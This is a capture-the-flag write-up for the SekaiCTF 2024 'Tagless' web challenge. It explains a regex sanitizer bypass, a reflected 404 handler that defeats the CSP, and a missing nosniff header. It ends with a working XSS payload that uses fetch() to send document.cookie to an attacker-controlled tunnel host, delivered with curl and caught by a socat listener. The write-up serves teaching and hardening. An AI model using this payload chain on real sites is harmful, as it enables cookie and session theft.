This is a writeup for the SekaiCTF 2024 Tagless challenge.
- Challenge URL: https://2024.ctf.sekai.team/challenges/#Tagless-23
- Challenge category: Web
- Time required: 4h
- Date solved: 2024-08-24
Challenge Notes
Tagless
Who needs tags anyways
Author: elleuch
Solution Summary
Despite a sound Content Security Policy (CSP) in place, the application was susceptible to four vulnerabilities:
- The HTTP error handler allows arbitrary content injection
- HTTP responses do not instruct the browser to stop sniffing MIME types
- Untrusted user input is not sanitized correctly, due to a faulty blacklist-based sanitization function
- A harmless-looking input form allows chaining the above vulnerabilities to a complete exploit
These vulnerabilities allowed me to retrieve the flag.
Recommended measures for system administrators:
- Review web application Content Security Policies (CSPs).
- Review web application X-Content-Type-Options headers.
- Review HTTP error handlers such as 404 handlers for arbitrary content injections. Content Injection is also called Content Spoofing.
Solution
Download and run app
We download the application source code from the following URL:
https://2024.ctf.sekai.team/files/9822f07416cd5d230d9b7c9a97386bba/dist.zip
We review the contents of the archive:
unzip -l dist.zip
Archive: dist.zip
Length Date Time Name
--------- ---------- ----- ----
758 08-16-2024 11:19 Dockerfile
60 08-16-2024 11:19 build-docker.sh
59 08-16-2024 11:19 requirements.txt
0 08-16-2024 11:19 src/
1277 08-16-2024 11:19 src/app.py
987 08-16-2024 11:19 src/bot.py
0 08-16-2024 11:19 src/static/
1816 08-16-2024 11:19 src/static/app.js
0 08-16-2024 11:19 src/templates/
1807 08-16-2024 11:19 src/templates/index.html
--------- -------
6764 10 files
The archive contains the following parts:
- A Flask application in src/app.py and src/bot.py.
- A Dockerfile to serve the application, and Python package requirements captured in requirements.txt.
- A web page served by the above Flask application in src/templates/index.html and src/static/app.js.
Let’s build and run Tagless using the Dockerfile together with podman:
mkdir dist.zip.unpacked
unzip dist.zip -d dist.zip.unpacked
podman build --tag tagless --file dist.zip.unpacked/Dockerfile
podman run -p 5000:5000 --name tagless tagless
Understanding the / page script
The / landing page accepts the query parameters fulldisplay and auto_input.
We investigate src/static/app.js to understand exactly what happens when the landing page loads. Here’s the annotated and slightly abbreviated version to show the code path that we are interested in:
// src/static/app.js
function sanitizeInput(str) {
  str = str
    .replace(/<.*>/gim, "")
    .replace(/<\.*>/gim, "")
    .replace(/<.*>.*<\/.*>/gim, "");
  return str;
}

function autoDisplay() {
  const urlParams = new URLSearchParams(window.location.search);
  const input = urlParams.get("auto_input");
  displayInput(input);
}

function displayInput(input) {
  const urlParams = new URLSearchParams(window.location.search);
  const fulldisplay = urlParams.get("fulldisplay");
  var sanitizedInput = "";
  sanitizedInput = sanitizeInput(input);
  var iframe = document.getElementById("displayFrame");
  var iframeContent = `
    <!DOCTYPE html>
    <head>
      <title>Display</title>
      <link href="https://fonts.googleapis.com/css?family=Press+Start+2P" rel="stylesheet">
      <style>
        body {
          font-family: 'Press Start 2P', cursive;
          color: #212529;
          padding: 10px;
        }
      </style>
    </head>
    <body>
      ${sanitizedInput}
    </body>
  `;
  iframe.contentWindow.document.open("text/html", "replace");
  iframe.contentWindow.document.write(iframeContent);
  iframe.contentWindow.document.close();
  if (fulldisplay && sanitizedInput) {
    var tab = open("/");
    tab.document.write(
      iframe.contentWindow.document.documentElement.innerHTML,
    );
  }
}

autoDisplay();
When the landing page loads with a URL of the form /?fulldisplay=1&auto_input=XSS, the above script will do the following:
- Call autoDisplay().
- Retrieve the auto_input URL query parameter.
- Retrieve the fulldisplay URL query parameter.
- Sanitize auto_input in sanitizeInput() by:
  - Removing all strings of the form <TAG> or <> using the regular expression <.*>. Because .* is greedy, a match runs from the first < to the last > on the same line.
  - Removing strings such as <> or <.> using the regular expression <\.*>. The escaped period only matches literal dots, so this is probably a typo.
  - Removing all strings of the form <TAG>...</TAG> or just <></> using the regular expression <.*>.*<\/.*>.
- Write some standard HTML, with the sanitized input inserted into the <body> tag, into the displayFrame <iframe>.
- If fulldisplay is set and the sanitized input is not empty, copy the <iframe> contents into a new window using open("/").document.write().
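To see how the two query parameters are parsed, here is a small sketch that runs in Node.js or a browser console. The query strings and the readParams() helper are made up for illustration; only URLSearchParams and its get() method come from the script above.

```javascript
// Hypothetical helper: returns the two parameters that app.js reads.
function readParams(search) {
  const params = new URLSearchParams(search);
  return {
    fulldisplay: params.get("fulldisplay"),
    autoInput: params.get("auto_input"),
  };
}

// A bare parameter without "=" has the empty string as its value.
const bare = readParams("?fulldisplay&auto_input=XSS");
// Percent-escapes such as %0d are decoded before the script sees them.
const valued = readParams("?fulldisplay=1&auto_input=a%0db");
// A parameter that is absent yields null.
const missing = readParams("?auto_input=XSS");

console.log(JSON.stringify(bare));
console.log(JSON.stringify(valued));
console.log(JSON.stringify(missing));
```

An empty string is falsy in the if (fulldisplay && sanitizedInput) check, so the new window only opens when fulldisplay carries a non-empty value.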
The (abbreviated) <iframe> contents will therefore look like the following for the input auto_input=XSS:
<!doctype html>
<head>
<title>Display</title>
<!-- ... -->
</head>
<body>
XSS
</body>
We note at this point that the regular expressions above have one fatal flaw. The period character . matches anything except line terminators such as line feeds and carriage returns.
If the snippet we pass contains a tag like <script>window.alert()</script>, it will get filtered out.
If we instead add a few carriage returns in the right spots, we can fool our sanitizeInput() function into leaving us alone.
After messing around in regex101 for a while, I came up with the following prototype injection:
<script\x0d>window.alert()</\x0dscript>
Where \x0d indicates a carriage return insertion. Inserted into a URL, this will look like the following:
/?autodisplay&auto_input=<script%0d>window.alert()</%0dscript>
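The bypass can be reproduced outside the browser. The following sketch copies sanitizeInput() from src/static/app.js and feeds it two inputs; the variable names are mine, and the check only covers the regular expressions, not how a browser later parses the surviving markup.

```javascript
// Copy of sanitizeInput() from src/static/app.js
function sanitizeInput(str) {
  return str
    .replace(/<.*>/gim, "")
    .replace(/<\.*>/gim, "")
    .replace(/<.*>.*<\/.*>/gim, "");
}

// A plain script tag sits on one line, so <.*> swallows all of it.
const plain = "<script>window.alert()</script>";
// With carriage returns inside the tags, no "<" and ">" share a line.
const evasive = "<script\r>window.alert()</\rscript>";

const plainResult = sanitizeInput(plain);
const evasiveResult = sanitizeInput(evasive);

console.log(JSON.stringify(plainResult));
console.log(JSON.stringify(evasiveResult));
```

The first input comes back empty, while the second passes through unchanged because . never matches the carriage return.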
Understanding the /report endpoint
Next, we study the Python application’s source code to see how we can leverage the above sanitization circumvention into a reflected XSS attack.
Here’s the annotated source for report() in src/app.py:
# src/app.py
@app.route("/report", methods=["POST"])
def report():
    # The actual Bot() code is described further below
    bot = Bot()
    # Require the form-encoded (application/x-www-form-urlencoded) `url` parameter
    url = request.form.get('url')
    if url:
        # URL must be
        # 1. a valid URL
        try:
            parsed_url = urlparse(url)
        except Exception:
            return {"error": "Invalid URL."}, 400
        # 2. start with http/https
        if parsed_url.scheme not in ["http", "https"]:
            return {"error": "Invalid scheme."}, 400
        # 3. must be localhost or 127.0.0.1
        if parsed_url.hostname not in ["127.0.0.1", "localhost"]:
            return {"error": "Invalid host."}, 401
        # the bot visits the page, but nothing else
        bot.visit(url)
        bot.close()
        return {"visited":url}, 200
    else:
        return {"error":"URL parameter is missing!"}, 400
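To get a feel for which URLs pass these checks, the three rules can be approximated in JavaScript. This is only a sketch: checkReportUrl() is a hypothetical helper, and it uses the WHATWG URL class, which is stricter than Python's urlparse(), so edge cases may be classified differently than by the real endpoint.

```javascript
// Approximates the checks in report() with the WHATWG URL class.
// Python's urlparse() is more lenient, so results can differ on odd input.
function checkReportUrl(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (err) {
    return { error: "Invalid URL.", status: 400 };
  }
  // URL.protocol includes the trailing colon
  if (!["http:", "https:"].includes(parsed.protocol)) {
    return { error: "Invalid scheme.", status: 400 };
  }
  if (!["127.0.0.1", "localhost"].includes(parsed.hostname)) {
    return { error: "Invalid host.", status: 401 };
  }
  return { visited: url, status: 200 };
}

const accepted = checkReportUrl("http://127.0.0.1:5000/?auto_input=XSS");
const wrongHost = checkReportUrl("https://example.com/");
const wrongScheme = checkReportUrl("ftp://localhost/");

console.log(accepted, wrongHost, wrongScheme);
```

Only the scheme and the hostname are inspected, so any path and query string on 127.0.0.1 or localhost is accepted.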
The report endpoint is a typical XSS bot endpoint used in CTFs. It is meant to simulate another user opening a link that we provide and triggering a reflected XSS injection.
For example, if we pass the URL http://localhost:5000 to the /report endpoint, the application spawns a headless browser and visits the URL.
We can achieve this with curl using the following command:
curl http://localhost:5000/report --data 'url=http://localhost:5000'
To understand what happens when the bot visits the page using bot.visit(url), we look at the Bot class source in src/bot.py:
from selenium import webdriver
#...
class Bot:
    def __init__(self):
        chrome_options = Options()
        # ...
        self.driver = webdriver.Chrome(options=chrome_options)

    def visit(self, url):
        # Visit the application's landing page
        self.driver.get("http://127.0.0.1:5000/")
        # Add a document.cookie containing the challenge flag
        self.driver.add_cookie({
            "name": "flag",
            "value": "SEKAI{dummy}",
            "httponly": False
        })
        # Retrieve the url passed to us in the `/report` POST request
        self.driver.get(url)
        # Wait a bit, and we are finished
        time.sleep(1)
        self.driver.refresh()
        print(f"Visited {url}")
    # ...
If we want to read out the cookie, we need to craft a JavaScript payload that reads document.cookie and sends it to an endpoint we control using fetch().
We then insert this payload into the landing page’s auto_input query parameter, and instruct the /report endpoint to open the resulting URL using the Bot():
curl http://127.0.0.1:5000/report \
--data 'url=http://127.0.0.1:5000/?fulldisplay&auto_input=XSS'
In comes a CSP
Unfortunately, while we were dreaming about solving this challenge after only a few minutes, we realize that a Content Security Policy (CSP) is in place, preventing us from injecting untrusted scripts:
# src/app.py
@app.after_request
def add_security_headers(resp):
    resp.headers['Content-Security-Policy'] = "script-src 'self'; style-src 'self' https://fonts.googleapis.com https://unpkg.com 'unsafe-inline'; font-src https://fonts.gstatic.com;"
    return resp
The relevant CSP that blocks untrusted JavaScript execution is:
script-src 'self';
With the above policy, a browser is instructed to ignore any scripts that do not come from the page’s origin at http://127.0.0.1:5000. Should we now try to inject a JavaScript snippet like the following, it will not work:
<script>
window.alert("xss");
</script>
The browser will refuse to run the above piece of JavaScript, because the script-src directive only permits 'self' and does not include 'unsafe-inline'.
Read more about available CSP source values on MDN.
Therefore, opening the following URL will not work, even if we are able to circumvent the script tag filtering:
http://127.0.0.1:5000/?autodisplay&auto_input=<script%0d>window.alert()</%0dscript>
The only way we can execute JavaScript is by making it “look” like it comes from the application origin itself.
Exploiting the 404 endpoint
We direct our attention towards the 404 endpoint. This is the source code for the application’s 404 error handler:
@app.errorhandler(404)
def page_not_found(error):
path = request.path
return f"{path} not found"
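This returns a response body that echoes the requested path. Note that the handler returns a bare string without a status code, so Flask sends it with its default 200 status rather than an actual 404. If we open the non-existing URL /does-not-exist, it will dutifully return: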
/does-not-exist not found
We can feed this URL anything, really anything, and it will give us the text back, unchanged. Including something that looks like JavaScript:
http://127.0.0.1:5000/a/;window.alert();//
We receive the following response when opening the above URL:
/a/;
window.alert(); // not found
That is perfectly valid JavaScript. We turn the path starting with a / into a stranded regular expression literal, and the trailing not found into a nice little comment. This way, we can create any JavaScript snippet and make it look like it comes from the same origin.
We have therefore found a way to defeat the content security policy.
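Whether a given 404 body is syntactically valid JavaScript can be checked without executing it. The sketch below imitates the error handler with a hypothetical notFoundBody() helper and uses new Function() purely as a parser; a function body is not exactly the same as a classic script, so treat this as an approximation.

```javascript
// Mirrors page_not_found(): the path is echoed back unchanged.
function notFoundBody(path) {
  return `${path} not found`;
}

// Parses the text without running it. new Function() compiles a function
// body, which is close enough to a classic script for a syntax check.
function parsesAsJavaScript(source) {
  try {
    new Function(source);
    return true;
  } catch (err) {
    if (err instanceof SyntaxError) return false;
    throw err;
  }
}

const harmless = notFoundBody("/does-not-exist");
const crafted = notFoundBody("/a/;window.alert();//");

console.log(harmless, parsesAsJavaScript(harmless));
console.log(crafted, parsesAsJavaScript(crafted));
```

The ordinary path fails to parse because its leading / opens a regular expression literal that is never closed, while the crafted path closes the literal and comments out the trailing text.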
Missing MIME type hardening
It’s easy to forget about MIME type sniffing
Even better, the application conveniently forgets to instruct the browser to respect the declared Content-Type and not sniff MIME types when loading the above not found URL.
The X-Content-Type-Options: nosniff header should have been set.
The error page is not served with a JavaScript Content-Type (Flask defaults to text/html for a bare string response), but our browser thinks it’s smarter and will gladly execute it as if it were Content-Type: application/javascript. That’s why hardening applications is so important.
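The effect of the missing header can be modeled roughly as follows. This is my simplified reading of the script-related MIME checks in the Fetch standard, not the behavior of any particular browser; scriptLoadAllowed() is a hypothetical helper and the list of JavaScript MIME types is deliberately shortened.

```javascript
// Simplified model of the Fetch standard's checks for script loads.
// The MIME type list is shortened; real browsers accept more legacy types.
const JAVASCRIPT_MIME_TYPES = new Set([
  "application/javascript",
  "text/javascript",
  "application/ecmascript",
  "text/ecmascript",
]);

function scriptLoadAllowed(contentType, nosniff) {
  // Drop parameters such as "; charset=utf-8"
  const mime = contentType.split(";")[0].trim().toLowerCase();
  if (nosniff) {
    // With nosniff, only real JavaScript MIME types may run as scripts
    return JAVASCRIPT_MIME_TYPES.has(mime);
  }
  // Without nosniff, only a few clearly wrong types are refused
  const refused = mime === "text/csv" || /^(image|audio|video)\//.test(mime);
  return !refused;
}

const withoutHeader = scriptLoadAllowed("text/html; charset=utf-8", false);
const withHeader = scriptLoadAllowed("text/html; charset=utf-8", true);

console.log(withoutHeader, withHeader);
```

Under this model, a single X-Content-Type-Options: nosniff response header would have stopped the 404 body from being executed as a script.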
Crafting the XSS payload
We have achieved the following four things:
- We have identified a vulnerability in the input sanitization.
- We found the exact point where JavaScript can be injected into the / page and how to extract the cookie flag.
- We identified a vulnerability in the 404 handler, allowing us to create same-origin resources.
- We found that a missing X-Content-Type-Options header allows us to create arbitrary text responses and have the browser creatively interpret them as JavaScript.
A little hiccup that I had was swapping localhost and 127.0.0.1 while working on this challenge. It is very important to observe that cookie domains are not interchangeable, even for localhost. The Bot’s cookie is set for 127.0.0.1 because of the following snippet in Bot.visit(self, url):
self.driver.get("http://127.0.0.1:5000/")
# Add a document.cookie containing the challenge flag
self.driver.add_cookie({
    "name": "flag",
    "value": "SEKAI{dummy}",
    "httponly": False
})
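The consequence for the payload URL can be sketched with a very reduced model of host-only cookie matching. It assumes that a cookie added without an explicit domain is scoped to the host of the page the browser is currently on; cookieIsSent() is a hypothetical helper, and real cookie matching has more rules than this.

```javascript
// Simplified host-only cookie matching: a cookie set while the browser was
// on one host is only attached to requests for exactly that host.
function cookieIsSent(cookieHost, requestUrl) {
  return new URL(requestUrl).hostname === cookieHost;
}

// The bot adds the flag cookie while on http://127.0.0.1:5000/
const flagCookieHost = new URL("http://127.0.0.1:5000/").hostname;

const viaIp = cookieIsSent(flagCookieHost, "http://127.0.0.1:5000/?auto_input=XSS");
const viaName = cookieIsSent(flagCookieHost, "http://localhost:5000/?auto_input=XSS");

console.log(viaIp, viaName);
```

Both hosts pass the /report validation, but under this model only the 127.0.0.1 variant gives the injected script a document.cookie that contains the flag.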
We spin up a request catcher using tunnelto.dev. I prefer it over ngrok for two reasons:
- It’s much cheaper than ngrok ($4 per month).
- The client is free software and available on nixpkgs.
I prefer free software for many reasons. NixOS rightfully complains about running the non-free ngrok with long-winded warning texts when trying to install it.
We start a challenge instance on tagless-XXXXXXXXXXXX.chals.sekai.team, and launch tunnelto with socat listening.
# Launch tunnelto
tunnelto --subdomain XXXXXXXXXXX --port 4444
# Launch socat
socat -v -d TCP-Listen:4444,fork STDIO
We craft the final payload and store it in payload.txt:
// payload.txt
http://127.0.0.1:5000/?fulldisplay=1&auto_input=<script src="http://127.0.0.1:5000/a/;fetch('https://XXXXXXXX.tunnelto.dev/'.concat('',document.cookie));//"%0d/></script%0d>hello
Broken apart, the payload is:
// the `/` page url
const url = "http://127.0.0.1:5000/?fulldisplay=1&auto_input=";
// the script we make the 404 handler generate for us
const innerScript =
"fetch('https://XXXXXXXX.tunnelto.dev/'.concat('',document.cookie))";
// the URL that will return the above script
const errorUrl = `http://127.0.0.1:5000/a/;${innerScript};//`;
// the script tag we inject into the iframe
const outerScript = `<script src="${errorUrl}"%0d/></script%0d>`;
// the full payload we want to pass to `/report`
const payload = `${url}${outerScript}`;
“URL!” “Script!” “Payload!” “Evasion!”
“Go Captain XSS!”
“By your powers combined, I am Captain XSS!”
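Before sending anything to the bot, the assembled URL can be checked offline. The sketch below rebuilds the payload from the pieces above, decodes auto_input the same way the landing page does, and runs it through a copy of sanitizeInput(). The XXXXXXXX host is the placeholder from the writeup, and the control case without carriage returns is my own addition.

```javascript
// Copy of sanitizeInput() from src/static/app.js
function sanitizeInput(str) {
  return str
    .replace(/<.*>/gim, "")
    .replace(/<\.*>/gim, "")
    .replace(/<.*>.*<\/.*>/gim, "");
}

// Same pieces as in payload.txt, with the placeholder tunnel host
const innerScript =
  "fetch('https://XXXXXXXX.tunnelto.dev/'.concat('',document.cookie))";
const errorUrl = `http://127.0.0.1:5000/a/;${innerScript};//`;
const pageUrl =
  "http://127.0.0.1:5000/?fulldisplay=1&auto_input=" +
  `<script src="${errorUrl}"%0d/></script%0d>hello`;

// Decode the query string like app.js does with window.location.search
const search = pageUrl.slice(pageUrl.indexOf("?"));
const autoInput = new URLSearchParams(search).get("auto_input");

// With the carriage returns in place, the tag survives sanitization
const sanitized = sanitizeInput(autoInput);
// Control case: without them, everything up to the last ">" is removed
const control = sanitizeInput(autoInput.replace(/\r/g, ""));

// A "+" in a query string decodes to a space
const plusDecoded = new URLSearchParams("?x='a'+'b'").get("x");

console.log(JSON.stringify(sanitized));
console.log(JSON.stringify(control));
console.log(JSON.stringify(plusDecoded));
```

The last check hints at one plausible reason for using .concat() in the payload: a + operator inside the query string would be decoded to a space before the script tag is written into the page.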
Since we don’t like messing with URL escapes too much, we let curl handle the task for us using the --data-urlencode flag:
curl https://tagless-XXXXXXXXXXXX.chals.sekai.team/report \
--data-urlencode url@payload.txt
socat receives the flag, and we are warmed up without tags.